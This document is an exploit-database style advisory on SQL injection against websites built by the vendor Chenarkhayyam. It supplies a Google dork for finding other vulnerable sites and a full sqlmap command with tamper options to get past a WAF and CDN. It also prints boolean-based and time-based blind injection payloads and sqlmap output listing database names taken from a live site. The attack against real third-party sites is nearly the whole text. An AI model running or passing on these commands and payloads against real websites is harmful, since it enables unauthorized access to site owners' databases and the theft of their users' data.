# Exploit Title: Chenarkhayyam - Sql Injection And Waf , Cdn Bypass # Google Dork : "طراحی شده توسط سایت چنار خیام" # Date: 3/16/2024 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: chenarkhayyam (https://chenarkhayyam.com/) # Version: MySQL=5.0.12 # Tested on: Windows/Linux/Android(termux) ## Description: Attacker can go to this web site and find other vulner sites or use google dork : https://chenarkhayyam.com/sample Next part attacker can use sqlmap to dump database and bypass waf and cdn Here is the command : sqlmap -u <Target-Url> --dbs --tamper=randomcase --random-agent --technique=BT --level=5 --risk=3 --threads=1 --current-db --batch # The response will show like this: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=44' AND 5914=5914-- DzUg Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=44' AND (SELECT 7630 FROM (SELECT(SLEEP(5)))zaOE)-- xHny --- [11:02:40] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [11:02:40] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.30 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [11:02:40] [INFO] fetching current database [11:02:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:02:41] [INFO] retrieved: baalinap_balinapp current database: 'baalinap_balinapp' [11:04:18] [INFO] fetching database names [11:04:18] [INFO] fetching number of databases [11:04:18] [INFO] resumed: 2 [11:04:18] [INFO] resumed: information_schema [11:04:18] [INFO] resumed: baalinap_balinapp available databases [2]: [*] baalinap_balinapp [*] information_schema